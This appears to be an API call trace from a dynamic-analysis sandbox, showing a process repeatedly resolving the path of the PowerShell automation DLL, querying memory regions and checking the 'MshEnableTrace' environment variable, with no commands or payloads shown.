	[0408.547] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c220, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0408.547] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c170, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0408.547] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c170, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0408.547] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c220, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0408.548] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c170, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0408.548] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c170, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0408.548] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c220, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0408.548] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c170, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0408.548] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c170, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0408.549] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c220, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0408.549] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c170, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0408.549] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c170, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0408.549] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c220, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0408.550] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c170, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0408.550] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c170, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0408.550] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c220, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0408.550] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c170, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0408.550] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c170, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0408.551] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c220, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0408.551] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c170, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0408.551] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c170, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0408.552] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c220, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0408.552] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c170, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0408.552] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c170, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0408.562] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c1b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0408.563] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c100, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0408.563] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c100, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0408.563] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c100, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0409.349] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c1b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0409.349] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c100, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0409.349] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c100, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0409.350] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c1b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0409.350] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c100, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0409.350] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c100, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0409.350] VirtualQuery (in: lpAddress=0x26b830, lpBuffer=0x26c6f0, dwLength=0x30 | out: lpBuffer=0x26c6f0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0409.355] CoTaskMemAlloc (cb=0x104) returned 0x46a6b0
	[0409.356] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x46a6b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0409.356] CoTaskMemFree (pv=0x46a6b0) 
	[0409.360] VirtualQuery (in: lpAddress=0x26b830, lpBuffer=0x26c6f0, dwLength=0x30 | out: lpBuffer=0x26c6f0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0409.368] CoTaskMemAlloc (cb=0x104) returned 0x46a6b0
	[0409.368] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x46a6b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0409.368] CoTaskMemFree (pv=0x46a6b0) 
	[0409.370] CoTaskMemAlloc (cb=0x104) returned 0x46a6b0
	[0409.370] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x46a6b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0409.370] CoTaskMemFree (pv=0x46a6b0) 
	[0409.374] CoTaskMemAlloc (cb=0x104) returned 0x46a6b0
	[0409.374] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x46a6b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0409.374] CoTaskMemFree (pv=0x46a6b0) 
	[0409.740] CoTaskMemAlloc (cb=0x104) returned 0x46a6b0
	[0409.740] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x46a6b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0409.740] CoTaskMemFree (pv=0x46a6b0) 
	[0409.744] CoTaskMemAlloc (cb=0x104) returned 0x46a6b0
	[0409.744] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x46a6b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0409.744] CoTaskMemFree (pv=0x46a6b0) 
	[0409.746] CoTaskMemAlloc (cb=0x104) returned 0x46a6b0
	[0409.746] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x46a6b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0409.746] CoTaskMemFree (pv=0x46a6b0) 
	[0409.750] VirtualQuery (in: lpAddress=0x26b830, lpBuffer=0x26c6f0, dwLength=0x30 | out: lpBuffer=0x26c6f0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0409.751] VirtualQuery (in: lpAddress=0x26b830, lpBuffer=0x26c6f0, dwLength=0x30 | out: lpBuffer=0x26c6f0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0410.225] VirtualQuery (in: lpAddress=0x26b830, lpBuffer=0x26c6f0, dwLength=0x30 | out: lpBuffer=0x26c6f0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0410.596] CoTaskMemAlloc (cb=0x104) returned 0x46a6b0
	[0410.596] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x46a6b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0410.596] CoTaskMemFree (pv=0x46a6b0) 
	[0411.093] LocalAlloc (uFlags=0x0, uBytes=0x100) returned 0x46aaf0
	[0411.423] LocalAlloc (uFlags=0x0, uBytes=0x100) returned 0x46ac00
	[0412.139] VirtualQuery (in: lpAddress=0x26b830, lpBuffer=0x26c6f0, dwLength=0x30 | out: lpBuffer=0x26c6f0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0412.828] VirtualQuery (in: lpAddress=0x26b830, lpBuffer=0x26c6f0, dwLength=0x30 | out: lpBuffer=0x26c6f0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0412.831] VirtualQuery (in: lpAddress=0x26b830, lpBuffer=0x26c6f0, dwLength=0x30 | out: lpBuffer=0x26c6f0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0412.831] VirtualQuery (in: lpAddress=0x26a280, lpBuffer=0x26b140, dwLength=0x30 | out: lpBuffer=0x26b140*(BaseAddress=0x26a000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x6000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0413.183] VirtualQuery (in: lpAddress=0x26b830, lpBuffer=0x26c6f0, dwLength=0x30 | out: lpBuffer=0x26c6f0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0413.184] VirtualQuery (in: lpAddress=0x26b830, lpBuffer=0x26c6f0, dwLength=0x30 | out: lpBuffer=0x26c6f0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0413.185] VirtualQuery (in: lpAddress=0x26b830, lpBuffer=0x26c6f0, dwLength=0x30 | out: lpBuffer=0x26c6f0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0413.186] VirtualQuery (in: lpAddress=0x26b830, lpBuffer=0x26c6f0, dwLength=0x30 | out: lpBuffer=0x26c6f0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0413.186] VirtualQuery (in: lpAddress=0x26b830, lpBuffer=0x26c6f0, dwLength=0x30 | out: lpBuffer=0x26c6f0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0413.187] VirtualQuery (in: lpAddress=0x26b830, lpBuffer=0x26c6f0, dwLength=0x30 | out: lpBuffer=0x26c6f0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0413.188] VirtualQuery (in: lpAddress=0x26b830, lpBuffer=0x26c6f0, dwLength=0x30 | out: lpBuffer=0x26c6f0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0413.188] VirtualQuery (in: lpAddress=0x26b830, lpBuffer=0x26c6f0, dwLength=0x30 | out: lpBuffer=0x26c6f0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0413.189] VirtualQuery (in: lpAddress=0x26b830, lpBuffer=0x26c6f0, dwLength=0x30 | out: lpBuffer=0x26c6f0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0413.189] VirtualQuery (in: lpAddress=0x26b830, lpBuffer=0x26c6f0, dwLength=0x30 | out: lpBuffer=0x26c6f0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0413.189] VirtualQuery (in: lpAddress=0x26b830, lpBuffer=0x26c6f0, dwLength=0x30 | out: lpBuffer=0x26c6f0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0413.189] VirtualQuery (in: lpAddress=0x26b830, lpBuffer=0x26c6f0, dwLength=0x30 | out: lpBuffer=0x26c6f0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0413.189] VirtualQuery (in: lpAddress=0x26b830, lpBuffer=0x26c6f0, dwLength=0x30 | out: lpBuffer=0x26c6f0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0413.189] VirtualQuery (in: lpAddress=0x26b830, lpBuffer=0x26c6f0, dwLength=0x30 | out: lpBuffer=0x26c6f0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0413.189] VirtualQuery (in: lpAddress=0x26b830, lpBuffer=0x26c6f0, dwLength=0x30 | out: lpBuffer=0x26c6f0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0413.189] VirtualQuery (in: lpAddress=0x26b830, lpBuffer=0x26c6f0, dwLength=0x30 | out: lpBuffer=0x26c6f0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0413.190] VirtualQuery (in: lpAddress=0x26b830, lpBuffer=0x26c6f0, dwLength=0x30 | out: lpBuffer=0x26c6f0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0413.190] VirtualQuery (in: lpAddress=0x26b830, lpBuffer=0x26c6f0, dwLength=0x30 | out: lpBuffer=0x26c6f0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0413.190] VirtualQuery (in: lpAddress=0x26b830, lpBuffer=0x26c6f0, dwLength=0x30 | out: lpBuffer=0x26c6f0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0413.190] VirtualQuery (in: lpAddress=0x26b830, lpBuffer=0x26c6f0, dwLength=0x30 | out: lpBuffer=0x26c6f0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0413.190] VirtualQuery (in: lpAddress=0x26b830, lpBuffer=0x26c6f0, dwLength=0x30 | out: lpBuffer=0x26c6f0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0413.190] VirtualQuery (in: lpAddress=0x26b830, lpBuffer=0x26c6f0, dwLength=0x30 | out: lpBuffer=0x26c6f0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0413.190] VirtualQuery (in: lpAddress=0x26b830, lpBuffer=0x26c6f0, dwLength=0x30 | out: lpBuffer=0x26c6f0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0413.190] VirtualQuery (in: lpAddress=0x26b830, lpBuffer=0x26c6f0, dwLength=0x30 | out: lpBuffer=0x26c6f0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0413.190] VirtualQuery (in: lpAddress=0x26b830, lpBuffer=0x26c6f0, dwLength=0x30 | out: lpBuffer=0x26c6f0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0413.190] VirtualQuery (in: lpAddress=0x26b830, lpBuffer=0x26c6f0, dwLength=0x30 | out: lpBuffer=0x26c6f0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0413.191] VirtualQuery (in: lpAddress=0x26b830, lpBuffer=0x26c6f0, dwLength=0x30 | out: lpBuffer=0x26c6f0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
